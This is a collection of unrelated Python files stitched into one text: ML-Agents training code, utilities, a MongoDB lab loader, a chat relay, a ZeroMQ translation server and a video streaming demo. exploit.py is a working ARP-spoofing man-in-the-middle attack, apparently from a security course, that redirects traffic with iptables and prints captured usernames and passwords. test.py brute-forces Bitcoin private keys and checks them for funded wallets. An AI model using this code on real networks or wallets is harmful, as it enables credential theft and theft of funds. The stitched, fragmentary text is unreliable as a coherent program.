from mlagents.trainers.trainer import TrainerFactory
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.agent_processor import AgentManager
from mlagents.tf_utils.globals import get_rank
from mlagents import torch_utils
class TrainerController:
def __init__(
self,
trainer_factory: TrainerFactory,
output_path: str,
run_id: str,
param_manager: EnvironmentParameterManager,
train: bool,
training_seed: int,
):
"""
:param output_path: Path to save the model.
:param summaries_dir: Folder to save training summaries.
:param run_id: The sub-directory name for model and summary statistics
:param param_manager: EnvironmentParameterManager object which stores information about all
environment parameters.
:param train: Whether to train model, or only run inference.
:param training_seed: Seed to use for Numpy and Tensorflow random number generation.
:param threaded: Whether or not to run trainers in a separate thread. Disable for testing/debugging.
"""
self.trainers: Dict[str, Trainer] = {}
self.brain_name_to_identifier: Dict[str, Set] = defaultdict(set)
self.trainer_factory = trainer_factory
self.output_path = output_path
self.logger = get_logger(__name__)
self.run_id = run_id
self.train_model = train
self.param_manager = param_manager
self.ghost_controller = self.trainer_factory.ghost_controller
self.registered_behavior_ids: Set[str] = set()
self.trainer_threads: List[threading.Thread] = []
self.kill_trainers = False
np.random.seed(training_seed)
tf.set_random_seed(training_seed)
if torch_utils.is_available():
torch_utils.torch.manual_seed(training_seed)
self.rank = get_rank()
@timed
def _save_models(self):
"""
Saves current model to checkpoint folder.
"""
if self.rank is not None and self.rank != 0:
return
for brain_name in self.trainers.keys():
self.trainers[brain_name].save_model()
self.logger.info("Saved Model")
@staticmethod
def _create_output_path(output_path):
try:
if not os.path.exists(output_path):
os.makedirs(output_path)
except Exception:
raise UnityEnvironmentException(
f"The folder {output_path} containing the "
"generated model could not be "
"accessed. Please make sure the "
"permissions are set correctly."
)
@timed
def _reset_env(self, env_manager: EnvManager) -> None:
"""Resets the environment.
Returns:
A Data structure corresponding to the initial reset state of the
environment.
"""
new_config = self.param_manager.get_current_samplers()
env_manager.reset(config=new_config)
# Register any new behavior ids that were generated on the reset.
self._register_new_behaviors(env_manager, env_manager.first_step_infos)
def _not_done_training(self) -> bool:
return (
any(t.should_still_train for t in self.trainers.values())
or not self.train_model
) or len(self.trainers) == 0
def _create_trainer_and_manager(
self, env_manager: EnvManager, name_behavior_id: str
) -> None:
parsed_behavior_id = BehaviorIdentifiers.from_name_behavior_id(name_behavior_id)
brain_name = parsed_behavior_id.brain_name
trainerthread = None
if brain_name in self.trainers:
trainer = self.trainers[brain_name]
else:
trainer = self.trainer_factory.generate(brain_name)
self.trainers[brain_name] = trainer
if trainer.threaded:
# Only create trainer thread for new trainers
trainerthread = threading.Thread(
target=self.trainer_update_func, args=(trainer,), daemon=True
)
self.trainer_threads.append(trainerthread)
policy = trainer.create_policy(
parsed_behavior_id, env_manager.training_behaviors[name_behavior_id]
)
trainer.add_policy(parsed_behavior_id, policy)
agent_manager = AgentManager(
policy,
name_behavior_id,
trainer.stats_reporter,
trainer.parameters.time_horizon,
threaded=trainer.threaded,
)
env_manager.set_agent_manager(name_behavior_id, agent_manager)
env_manager.set_policy(name_behavior_id, policy)
self.brain_name_to_identifier[brain_name].add(name_behavior_id)
trainer.publish_policy_queue(agent_manager.policy_queue)
trainer.subscribe_trajectory_queue(agent_manager.trajectory_queue)
# Only start new trainers
if trainerthread is not None:
trainerthread.start()
def _create_trainers_and_managers(
self, env_manager: EnvManager, behavior_ids: Set[str]
) -> None:
for behavior_id in behavior_ids:
self._create_trainer_and_manager(env_manager, behavior_id)
@timed
def start_learning(self, env_manager: EnvManager) -> None:
self._create_output_path(self.output_path)
tf.reset_default_graph()
try:
# Initial reset
self._reset_env(env_manager)
while self._not_done_training():
n_steps = self.advance(env_manager)
for _ in range(n_steps):
self.reset_env_if_ready(env_manager)
# Stop advancing trainers
self.join_threads()
except (
KeyboardInterrupt,
UnityCommunicationException,
UnityEnvironmentException,
UnityCommunicatorStoppedException,
) as ex:
self.join_threads()
self.logger.info(
"Learning was interrupted. Please wait while the graph is generated."
)
if isinstance(ex, KeyboardInterrupt) or isinstance(
ex, UnityCommunicatorStoppedException
):
pass
else:
# If the environment failed, we want to make sure to raise
                # the exception so we exit the process with a return code of 1.
raise ex
finally:
if self.train_model:
self._save_models()
def end_trainer_episodes(self) -> None:
# Reward buffers reset takes place only for curriculum learning
# else no reset.
for trainer in self.trainers.values():
trainer.end_episode()
def reset_env_if_ready(self, env: EnvManager) -> None:
# Get the sizes of the reward buffers.
reward_buff = {k: list(t.reward_buffer) for (k, t) in self.trainers.items()}
curr_step = {k: int(t.step) for (k, t) in self.trainers.items()}
max_step = {k: int(t.get_max_steps) for (k, t) in self.trainers.items()}
# Attempt to increment the lessons of the brains who
# were ready.
updated, param_must_reset = self.param_manager.update_lessons(
curr_step, max_step, reward_buff
)
if updated:
for trainer in self.trainers.values():
trainer.reward_buffer.clear()
# If ghost trainer swapped teams
ghost_controller_reset = self.ghost_controller.should_reset()
if param_must_reset or ghost_controller_reset:
self._reset_env(env) # This reset also sends the new config to env
self.end_trainer_episodes()
elif updated:
env.set_env_parameters(self.param_manager.get_current_samplers())
@timed
def advance(self, env_manager: EnvManager) -> int:
# Get steps
with hierarchical_timer("env_step"):
new_step_infos = env_manager.get_steps()
self._register_new_behaviors(env_manager, new_step_infos)
num_steps = env_manager.process_steps(new_step_infos)
# Report current lesson for each environment parameter
for (
param_name,
lesson_number,
) in self.param_manager.get_current_lesson_number().items():
for trainer in self.trainers.values():
trainer.stats_reporter.set_stat(
f"Environment/Lesson Number/{param_name}", lesson_number
)
for trainer in self.trainers.values():
if not trainer.threaded:
with hierarchical_timer("trainer_advance"):
trainer.advance()
return num_steps
def _register_new_behaviors(
self, env_manager: EnvManager, step_infos: List[EnvironmentStep]
) -> None:
"""
Handle registration (adding trainers and managers) of new behaviors ids.
:param env_manager:
:param step_infos:
:return:
"""
step_behavior_ids: Set[str] = set()
for s in step_infos:
step_behavior_ids |= set(s.name_behavior_ids)
new_behavior_ids = step_behavior_ids - self.registered_behavior_ids
self._create_trainers_and_managers(env_manager, new_behavior_ids)
self.registered_behavior_ids |= step_behavior_ids
def join_threads(self, timeout_seconds: float = 1.0) -> None:
"""
Wait for threads to finish, and merge their timer information into the main thread.
:param timeout_seconds:
:return:
"""
self.kill_trainers = True
for t in self.trainer_threads:
try:
t.join(timeout_seconds)
except Exception:
pass
with hierarchical_timer("trainer_threads") as main_timer_node:
for trainer_thread in self.trainer_threads:
thread_timer_stack = get_timer_stack_for_thread(trainer_thread)
if thread_timer_stack:
main_timer_node.merge(
thread_timer_stack.root,
root_name="thread_root",
is_parallel=True,
)
merge_gauges(thread_timer_stack.gauges)
def trainer_update_func(self, trainer: Trainer) -> None:
while not self.kill_trainers:
with hierarchical_timer("trainer_advance"):
trainer.advance()
|
util.py
|
import csv
import os
import sys
import time
import threading
from os import system
if os.name == 'nt':
import win32com.client as wincl
import pythoncom
def pythonpath():
return os.environ['PYTHONPATH']
def println(s):
print(s)
def write(s):
sys.stdout.write(s)
sys.stdout.flush()
# from gtts import gTTS
# from tempfile import TemporaryFile, NamedTemporaryFile
# utility functions
def thread(target, args=(), ):
threading.Thread(target=target, args=args).start()
def daemon(target, args=(), ):
threading.Thread(target=target, daemon=True, args=args).start()
is_profiling = False
last_profile_point = False
profile = []
# set a profile point. If profiling is on, this point will be included with the message s
def prof(s):
if is_profiling:
t = time.time()
if len(profile) > 0:
profile.append((t - profile[len(profile) - 1][2], s, t))
else:
profile.append((0, s, t))
# similar to prof(), but this is the starting or end point for a single profile
def main_prof(s):
global last_profile_point, is_profiling
if last_profile_point:
prof(s)
is_profiling = False
last_profile_point = False
print_prof()
profile.clear()
elif is_profiling:
prof(s)
last_profile_point = True
# print the results of a single profile to find out what sections of code are slowing down the algorithm
def print_prof():
print('--------------------')
print('\tprofile')
print('--------------------')
for t, s, unused in profile:
print("{0:.1f}".format(t * 1000) + "\t" + s)
print('--------------------')
print('total: ' + str(profile[len(profile) - 1][2] - profile[0][2]))
print('--------------------')
def append(file, s):
with open(file, "a") as my_file:
my_file.write(str(s))
def clear_file(file):
with open(file, "w") as my_file:
my_file.write("")
def appendln(file, s):
append(file, s + "\n")
# from pygame import mixer
# mixer.init()
def say(s):
s = str(s)
print('saying: ' + s)
if os.name == 'posix':
system('say ' + s)
elif os.name == 'nt':
# tts = gTTS(text=s,lang='en')
# f = NamedTemporaryFile()
# tts.save(f.name)
# mixer.music.load(f.name)
# mixer.music.play()
pythoncom.CoInitialize()
speak = wincl.Dispatch("SAPI.SpVoice")
speak.Speak(s)
# Note: despite the name, micros() returns milliseconds since the epoch.
def micros():
return time.time() * 1000
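# lines(f): count the rows of a comma-separated file using csv.reader;
# last_line_n(f) returns the zero-based index of the last row.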
def lines(f):
with open(f, 'r') as tsvin:
l = 0
last = 0
tsvr = csv.reader(tsvin, delimiter=',')
for i in tsvr:
l = l + 1
last = l - 1
return l
def last_line_n(f):
return lines(f) - 1
def is_int(s):
try:
int(s)
return True
except ValueError:
return False
def is_float(s):
try:
float(s)
return True
except ValueError:
return False
|
exploit.py
|
#!/usr/bin/python
# Server base code obtained from: http://www.codexpedia.com/python/python-web-server-for-get-and-post-requests/
# Additional code has been added in do_POST for the assignment, same as malicious gateway post
# get_mac address obtained from: http://www.aviran.org/arp-poisoning-python-scapy/
from scapy.all import *
from http.server import BaseHTTPRequestHandler, HTTPServer
from subprocess import run
import cgi, http.client, urllib.parse, sys, threading
def get_mac_address():
my_macs = [get_if_hwaddr(i) for i in get_if_list()]
for mac in my_macs:
if(mac != "00:00:00:00:00:00"):
return mac
#set variables
my_mac = get_mac_address()
gateway = '10.0.0.1'
victim = '10.0.0.2'
#construct arp spoof packet
packet = Ether()/ARP(op=1,hwsrc=my_mac,psrc=gateway,pdst=victim)
#Http server to handle get and post request from alice
class GP(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_headers()
conn = http.client.HTTPSConnection("https-only.seclab.space")
conn.request("GET", "")
response = conn.getresponse()
data = response.read()
conn.close()
print (response.status, response.reason)
print(data)
self.wfile.write(data)
def do_POST(self):
self._set_headers()
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST'}
)
username = form.getvalue("username")
password = form.getvalue("password")
params = urllib.parse.urlencode({'username': username, 'password': password, 'action': 'show'})
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain"}
conn = http.client.HTTPSConnection("https-only.seclab.space")
conn.request("POST", "", params, headers)
response = conn.getresponse()
data = response.read()
conn.close()
print (response.status, response.reason)
print (data)
print ("username = " + form.getvalue("username")+", password = " + form.getvalue("password"))
self.wfile.write(data)
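# setIpTables: points DNS at 8.8.8.8, enables NAT masquerading and forwarding
# between eth0 and eth1, and DNATs inbound HTTP (port 80) for the spoofed
# address to the local server on 10.0.0.3:8080 so victim traffic passes
# through the handler above.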
def setIpTables():
with open('/etc/resolv.conf', 'w+') as f:
f.write('nameserver 8.8.8.8')
print(run(['iptables', '-t', 'nat', '-A', 'POSTROUTING', '-o', 'eth0', '-j', 'MASQUERADE']))
print(run(['iptables', '-A', 'FORWARD', '-i', 'eth0', '-o', 'eth1', '-m', 'state', '--state', 'RELATED,ESTABLISHED', '-j', 'ACCEPT']))
print(run(['iptables', '-A', 'FORWARD', '-i', 'eth1', '-o', 'eth0', '-j', 'ACCEPT']))
print(run(['iptables', '-t', 'nat', '-A', 'PREROUTING', '-p', 'tcp', '-i', 'eth0', '-d', '142.1.97.172', '--dport', '80', '-j', 'DNAT', '--to-destination', '10.0.0.3:8080']))
def runServer(server_class=HTTPServer, handler_class=GP, port=8080):
server_address = ('', port)
print(type(server_address), type(handler_class))
httpd = server_class(server_address, handler_class)
print ('Server running at localhost:%s...' % port)
httpd.serve_forever()
#loop to keep sending packet
def sendPacket():
t=threading.Timer(2.0, sendPacket)
sendp(packet, verbose=0)
t.start()
if __name__ == "__main__":
setIpTables()
#run arp spoof packet sending function in background thread
thread = threading.Thread(target=sendPacket, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
runServer()
|
anonserv.py
|
import socket, sys, os, threading
class colors:
RED = '\033[31m'
YELLOW = '\33[33m'
GREEN = '\33[32m'
PINK = '\33[35m'
WHITE = '\33[37m'
def header():
return(colors.RED + '''
▄▄▄ ███▄ █ ▒█████ ███▄ █ ▄████▄ ██░ ██ ▄▄▄ ▄▄▄█████▓
▒████▄ ██ ▀█ █ ▒██▒ ██▒ ██ ▀█ █ ▒██▀ ▀█ ▓██░ ██▒▒████▄ ▓ ██▒ ▓▒
▒██ ▀█▄ ▓██ ▀█ ██▒▒██░ ██▒▓██ ▀█ ██▒ ▒▓█ ▄ ▒██▀▀██░▒██ ▀█▄ ▒ ▓██░ ▒░
░██▄▄▄▄██ ▓██▒ ▐▌██▒▒██ ██░▓██▒ ▐▌██▒ ▒▓▓▄ ▄██▒░▓█ ░██ ░██▄▄▄▄██░ ▓██▓ ░
▓█ ▓██▒▒██░ ▓██░░ ████▓▒░▒██░ ▓██░ ▒ ▓███▀ ░░▓█▒░██▓ ▓█ ▓██▒ ▒██▒ ░
▒▒ ▓▒█░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ░ ░▒ ▒ ░ ▒ ░░▒░▒ ▒▒ ▓▒█░ ▒ ░░
▒ ▒▒ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ░ ░░ ░ ▒░ ░ ▒ ▒ ░▒░ ░ ▒ ▒▒ ░ ░
░ ▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ▒ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-(By PKuz)-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
''')
ZOMBIES = []
USERS = {}
def server_start():
try:
IP = str(sys.argv[1])
PORT = int(sys.argv[2])
except:
print(colors.RED + "[*] Usage: python3 server.py <IP> <PORT>" + colors.WHITE)
sys.exit()
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((IP,PORT))
server.listen(10)
print(header())
print(colors.RED + '[' + colors.GREEN + '*' + colors.RED + '] Server successfully started on ' + IP + ':' + str(PORT) + '.' + colors.WHITE)
serv_key = gen_key(15)
print(colors.RED + '[' + colors.GREEN + '*' + colors.RED + '] Key: ' + serv_key + colors.WHITE)
except:
print(colors.RED + '[' + colors.YELLOW + '*' + colors.RED + '] Unable to start server on ' + IP + ':' + str(PORT) + '.' + colors.WHITE)
sys.exit()
try:
while(1):
c, a = server.accept()
creds = c.recv(2048).decode().split()
creds[1] = ' '.join(creds[1:])
if creds[0] != str(serv_key):
import time
kickMSG = '[*] Kicked for invalid server credentials or duplicate username.'
c.send(bytes(kickMSG.encode()))
print(colors.YELLOW + 'Zombie kicked from ' + str(a) + ' for incorrect key.')
time.sleep(0.03)
c.close()
elif creds[1] in USERS.values():
c.close()
print(colors.YELLOW + 'Zombie kicked from ' + str(a) + ' for duplicate username.')
else:
print(colors.GREEN + 'Zombie connected from ' + str(a))
USERS[str(a)] = creds[1]
ZOMBIES.append(c)
anon = header()
c.send(bytes(anon.encode()))
thread = threading.Thread(target=vacuum, args=(c,a))
thread.start()
except:
os.system('cls' if os.name == 'nt' else 'clear')
print(colors.RED + '[' + colors.YELLOW + '*' + colors.RED + '] Server closed.' + colors.WHITE)
server.close()
os._exit(1)
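# vacuum: per-client receive loop. Relays each message, prefixed with the
# sender's username, to every socket in ZOMBIES; an empty read means the
# client disconnected, so it is removed from USERS and ZOMBIES.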
def vacuum(c,a):
while(1):
info = c.recv(2048).decode()
if not info:
print(colors.YELLOW + 'Zombie disconnected from ' + str(a) + '.')
del USERS[str(a)]
ZOMBIES.remove(c)
c.close()
break
info = USERS[str(a)] + ': ' + info
for z in ZOMBIES:
z.send(info.encode())
def gen_key(x):
import secrets
return secrets.token_hex(x)
if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')
server_start()
|
loader.py
|
#!/usr/bin/env python3
"""
M040 - Error Handling Lab Loader
--------------------------------
This is a multiprocessing script that processes the dataset file in
batches, where each spawned process will handle a portion of the file.
Usage:
loader.py [--uri=<uri>] [--file=<file>]
Options:
-h --help Show this help text.
--uri=<uri> MongoDB connection uri [default: mongodb://m040:27017/m040?replicaSet=M040]
--file=<file> Dataset file location [default: ./data.json]
"""
import pymongo
import json
from docopt import docopt
from itertools import islice
from multiprocessing import Process, Queue
def drop_dataset(uri):
"""
Drop this lab's collections
"""
mc = pymongo.MongoClient(uri)
db = mc.m040
db.drop_collection('cities')
db.drop_collection('city_stats')
def touch_collections(uri):
"""
Creates all necessary dataset collections
"""
mc = pymongo.MongoClient(uri)
db = mc.m040
db.city_stats.insert_one({"_id": "loader"})
db.create_collection('cities')
def handle_commit(s):
"""
Handles the commit operation.
"""
# LAB - needs error handling
try:
s.commit_transaction()
except Exception as exc:
# do something here
raise
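# A common approach for handle_commit above is to retry s.commit_transaction()
# when the exception carries the "UnknownTransactionCommitResult" error label
# (exc.has_error_label(...)) and to re-raise anything else.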
def write_batch(batch, mc, s):
"""
Executes the batch write operation
"""
try:
s.start_transaction()
result = mc.m040.cities.insert_many(batch, session=s)
batch_total_population = sum(d['population'] for d in batch)
mc.m040.city_stats.update_one({'_id': 'loader'},
{"$inc": {"population_total": batch_total_population}},
session=s
)
handle_commit(s)
except (pymongo.errors.DuplicateKeyError) as dupex:
print("Duplicate Key Found: {}".format(dupex))
s.abort_transaction()
return(0,0)
return (batch_total_population,len(result.inserted_ids))
def load_data(q, batch, uri):
"""
Inserts the `batch` of documents into collections.
"""
mc = pymongo.MongoClient(uri)
batch_total_population = 0
batch_docs = 0
try:
# LAB - needs error handling
with mc.start_session() as s:
try:
batch_total_population,batch_docs = write_batch(batch, mc, s)
except Exception as exc:
# Do something here!
print("Error - what shall I do ??!??! {}".format(exc))
raise
q.put({"batch_pop": batch_total_population, "batch_docs": batch_docs })
except Exception as e:
print("Unexpected error found: {}".format(e))
def main(arguments):
"""
Error Handling Lab
------------------
1) Drops existing data
2) Create the collections
3) Starts transaction
4) Imports dataset
5) commits or aborts transaction
"""
# get MongoDB URI
uri = arguments['--uri']
# drop dataset
drop_dataset(uri)
# create collections
touch_collections(uri)
# Process Comms Queue
q = Queue(11)
# Process list
processes = []
#import dataset in batches
batch_size = 10
with open(arguments['--file'], 'rt') as fd:
for slice in iter(lambda: tuple(islice(fd, batch_size)),()):
batch = list(map(json.loads, slice))
processes.append( Process(target=load_data, args=(q, batch, uri)) )
for p in processes:
p.start()
for p in reversed(processes):
p.join()
total_processed_population = 0
total_processed_documents = 0
while q.qsize() > 0:
doc = q.get()
total_processed_population += doc['batch_pop']
total_processed_documents += doc['batch_docs']
print("Documents Inserted: {0}".format(total_processed_documents))
print("Total Population: {0}".format(total_processed_population))
if __name__ == '__main__':
arguments = docopt(__doc__)
main(arguments)
|
test.py
|
import threading
import os
import time
import random
import requests
import json
from bit import Key
from bit.format import bytes_to_wif
import traceback
maxPage = pow(2, 256) // 128
#maxPage = 904625697166532776746648320380374280100293470930272690489102837043110636675
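# Each "page" covers 128 consecutive private keys (mirroring directory.io):
# page N holds the keys (N - 1) * 128 + 1 .. N * 128.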
def getRandPage():
return random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
num = (pageNum - 1) * 128 + 1
try:
for i in range(num, num + 128):
key1 = Key.from_int(i)
wif = bytes_to_wif(key1.to_bytes(), compressed=False)
key2 = Key(wif)
keyList.append(hex(i)[2:])
addrList.append(key2.address)
addrList.append(key1.address)
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + key2.address
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + key1.address
except:
pass
return [keyList, addrList, addrStr1, addrStr2]
'''
def getPage(pageNum):
try:
r = requests.get(url='http://directory.io/%d' % pageNum, timeout=5)
r = r.content
except:
return []
keys = r.split("how-this-works!/")
addrs = r.split("blockchain.info/address/")
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
for i in range(1, len(keys)):
key = keys[i].split("\"")[0]
keyList.append(key)
for i in range(1, len(addrs)):
addr = addrs[i].split("\"")[0]
addrList.append(addr)
if i % 2 == 1:
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + addr
else:
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + addr
return [keyList, addrList, addrStr1, addrStr2]
'''
def getBalances(addrStr):
balances = "security"
while True:
if "security" not in balances: break
secAddr = balances.split("effects address ")
if len(secAddr) >= 2:
secAddr = secAddr[1].split(".")[0]
addrStr = addrStr.replace(secAddr + "|", "")
addrStr = addrStr.replace("|" + secAddr, "")
try:
r = requests.get(url='http://blockchain.info/multiaddr?active=%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
balances = balances['addresses']
except:
print (balances)
return balances
getCount = 0
#fp_found = open("found.txt", "w+")
#fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
page = getRandPage()
pageRet = getPage(page)
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 0
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
balancesRet = getBalances(pageRet[3])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 1
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
#fp_found.flush()
#fp_fund.flush()
except:
traceback.print_exc()
break
clearScreen()
print (getCount)
break
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
server.py
|
# -*- coding: utf-8 -*-
from logging import getLogger
from threading import Thread
from zmq import REQ, REP, Poller, POLLIN, Context, ROUTER, DEALER, proxy
import config
from translations_server.db import get_translation
from translations_server.lib import db
_LOG = getLogger(__name__)
_ENCODING = "utf-8"
_REQUEST_ENDPOINT = "inproc://requests"
_SYNC_ENDPOINT = "inproc://sync"
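# Architecture: run() bridges a TCP ROUTER frontend and an inproc DEALER
# backend with zmq.proxy(); worker threads connect REP sockets to the backend
# and answer translation requests, while the ROUTER sync socket is used to
# start and later shut down the workers.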
def _translate(lang, country, *key_plural_pairs):
""" Generator: get translations from the DB. """
# Group each two elements together to key and plural tuples.
key_plural_pairs = zip( # 1, 2, 3, 4, ... -> (1, 2), (3, 4), ...
key_plural_pairs[::2], key_plural_pairs[1::2])
for key, plural in key_plural_pairs:
plural = int(plural) if plural else None
translation = get_translation(lang, country, key, plural)
if translation is None:
extra = {
"lang": lang,
"country": country,
"plural": plural
}
_LOG.warning("Missing translation: %s", key, extra=extra)
yield translation or key
def _handle_request(parts):
""" Handle one translation request, translate and return the result.
In and out-puts are bytes.
:param parts: Translation fields:
- language
- country or `""`
- one or more pairs of key and plural form
:type parts: [bytes]
:return: The translations or `[b""]` if there was an encoding or format
error.
:rtype: [bytes] or [b""]
"""
translations = [b""] # error
try:
parts = [p.decode(_ENCODING) for p in parts]
except UnicodeDecodeError:
_LOG.exception("Decoding error", extra={"encoding": _ENCODING})
else:
if len(parts) < 4 or len(parts) % 2:
_LOG.warning("Wrong count of arguments.")
else:
lang, country = parts[:2]
try:
translations = [
t.encode(_ENCODING)
for t in _translate(lang, country, *parts[2:])]
except UnicodeEncodeError:
_LOG.exception(
"Could not encode translation!",
extra={"encoding": _ENCODING})
finally:
# Put connection back in the DB Pool
db.putback()
return translations
def _handle_requests(context):
""" This is supposed to run as a background thread.
It listens for translation requests and answers them until a message
arrives on the sync socket, whereupon the function (thread) ends.
:type context: zmq.Context
"""
sync_socket = context.socket(REQ)
sync_socket.connect(_SYNC_ENDPOINT)
requests_socket = context.socket(REP)
requests_socket.connect(_REQUEST_ENDPOINT)
_LOG.debug("Synchronizing worker")
sync_socket.send(b"")
sync_socket.recv()
sync_socket.send(b"")
keep_running = True
poller = Poller()
poller.register(requests_socket, POLLIN)
poller.register(sync_socket, POLLIN)
_LOG.debug("Running worker")
while keep_running:
sockets = dict(poller.poll())
if requests_socket in sockets:
try:
response = _handle_request(requests_socket.recv_multipart())
except Exception: # pylint: disable=broad-except
_LOG.critical("Handler crashed!", exc_info=True)
response = [b""]
requests_socket.send_multipart(response)
if sync_socket in sockets:
sync_socket.recv()
keep_running = False
_LOG.debug("Terminating worker")
def _start_workers(context, sync_socket, count, timeout=None):
"""
:type context: zmq.Context
:type sync_socket: zmq.Socket
:type count: int
:param timeout: Timeout for waiting for worker messages, in milliseconds.
:type timeout: float
"""
_LOG.debug("Starting workers...")
worker_threads = [
Thread(
target=_handle_requests, name="worker {}".format(i),
args=(context, ))
for i in range(count)]
for thread in worker_threads:
thread.start()
_LOG.debug("Synchronizing workers...")
poller = Poller()
poller.register(sync_socket, POLLIN)
worker_identities = []
for _ in worker_threads:
sockets = dict(poller.poll(timeout=timeout))
if sync_socket in sockets:
worker_identities.append(sync_socket.recv_multipart()[0])
else:
raise RuntimeError("Worker did not respond in time.")
for worker_identity in worker_identities:
sync_socket.send_multipart([worker_identity, b"", b""])
for _ in worker_identities:
sockets = dict(poller.poll(timeout=timeout))
if sync_socket in sockets:
sync_socket.recv_multipart()
else:
raise RuntimeError("Worker did not respond in time.")
_LOG.debug("Workers synchronized.")
return worker_threads, worker_identities
def _shut_down_workers(
sync_socket, worker_threads, worker_identities, timeout=None):
"""
:type sync_socket: zmq.Socket
:type worker_threads: [threading.Thread]
:type worker_identities: [bytes]
:param timeout: Timeout for waiting for worker threads, in seconds.
:type timeout: float
"""
_LOG.debug("Terminating workers...")
for worker_identity in worker_identities:
sync_socket.send_multipart([worker_identity, b"", b""])
for i, thread in enumerate(worker_threads):
thread.join(timeout=timeout)
if thread.is_alive():
raise RuntimeError("Worker {} did not terminate.".format(i))
_LOG.debug("Workers terminated.")
def run(port):
""" Run a translations server at a specific port.
It always listens on all available network devices!
"""
context = Context(1)
sync_socket = context.socket(ROUTER)
sync_socket.bind(_SYNC_ENDPOINT)
frontend = context.socket(ROUTER)
frontend.bind("tcp://*:{}".format(port))
# Socket facing services
backend = context.socket(DEALER)
backend.bind(_REQUEST_ENDPOINT)
try:
worker_threads, worker_identities = _start_workers(
context, sync_socket, int(config.WORKERS),
int(config.TIMEOUT_IN_MILLISECONDS))
_LOG.debug("Running device...")
try:
proxy(frontend, backend)
except KeyboardInterrupt:
print("\rShutting down...")
frontend.close()
frontend = None
_shut_down_workers(sync_socket, worker_threads, worker_identities, 5)
finally:
if frontend is not None:
frontend.close()
db.close()
backend.close()
sync_socket.close()
_LOG.debug("Done")
|
demo_rtp_processes.py
|
import numpy as np
import cv2
from multiprocessing import Process
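# send(): grabs frames from a GStreamer videotestsrc, encodes them as H.264 and
# streams them over RTP/UDP to 127.0.0.1:5000.
# receive(): reads the RTP stream from UDP port 5000, decodes it and shows it.
# Both run as separate processes; press 'q' in a preview window to stop.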
def send():
cap_send = cv2.VideoCapture('videotestsrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
out_send = cv2.VideoWriter('appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000',cv2.CAP_GSTREAMER,0, 20, (320,240), True)
if not cap_send.isOpened() or not out_send.isOpened():
print('VideoCapture or VideoWriter not opened')
exit(0)
while True:
ret,frame = cap_send.read()
if not ret:
print('empty frame')
break
out_send.write(frame)
cv2.imshow('send', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
cap_send.release()
out_send.release()
def receive():
cap_receive = cv2.VideoCapture('udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
if not cap_receive.isOpened():
print('VideoCapture not opened')
exit(0)
while True:
ret,frame = cap_receive.read()
if not ret:
print('empty frame')
break
cv2.imshow('receive', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
#cap_receive.release()
if __name__ == '__main__':
s = Process(target=send)
r = Process(target=receive)
s.start()
r.start()
s.join()
r.join()
cv2.destroyAllWindows()
|
panda_new.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
